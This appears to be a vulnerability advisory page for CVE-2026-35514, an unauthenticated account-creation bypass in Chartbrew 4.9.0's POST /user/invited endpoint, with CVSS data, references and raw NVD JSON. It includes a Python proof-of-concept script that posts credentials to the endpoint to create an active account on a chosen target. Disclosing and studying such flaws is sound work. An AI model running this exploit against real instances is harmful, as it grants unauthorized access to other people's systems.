Security Vulnerability Report
CVE-2026-35514 CVSS 6.5 MEDIUM

CVE-2026-35514

Published: 2026-04-30 19:16:09
Last Modified: 2026-05-01 15:31:02

Description

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, the endpoint POST /user/invited does not validate any invite token, authentication header, or session. Any unauthenticated attacker can call this endpoint directly to create a fully active account and receive a valid JWT, even when the instance has existing users and signupRestricted is enabled. This bypass is distinct from the normal registration endpoint (POST /user), which enforces signupRestricted and sets active: false pending verification. This issue has been patched in version 5.0.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Weakness
CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

Chartbrew < 5.0.0
Chartbrew 4.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_chartbrew(url):
    """
    PoC for CVE-2026-35514: Chartbrew Authentication Bypass via /user/invited
    """
    target_endpoint = f"{url.rstrip('/')}/user/invited"

    # Malicious payload to create a new active user
    payload = {
        "email": "[email protected]",
        "password": "Admin123!",
        "name": "Malicious User",
    }
    headers = {"Content-Type": "application/json"}

    try:
        print(f"[*] Sending request to {target_endpoint}...")
        response = requests.post(target_endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code in (200, 201):
            print("[+] Exploit successful! Account created.")
            print("[+] Response data:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://localhost:3000"  # Replace with actual target
    exploit_chartbrew(target)
```

References

https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0
https://github.com/chartbrew/chartbrew/security/advisories/GHSA-g47g-v5cp-j8hp

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35514",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T19:16:09.217",
    "lastModified": "2026-05-01T15:31:02.467",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, the endpoint POST /user/invited does not validate any invite token, authentication header, or session. Any unauthenticated attacker can call this endpoint directly to create a fully active account and receive a valid JWT — even when the instance has existing users and signupRestricted is enabled. This bypass is distinct from the normal registration endpoint (POST /user) which enforces signupRestricted and sets active: false pending verification. This issue has been patched in version 5.0.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-g47g-v5cp-j8hp",
        "source": "[email protected]"
      }
    ]
  }
}
```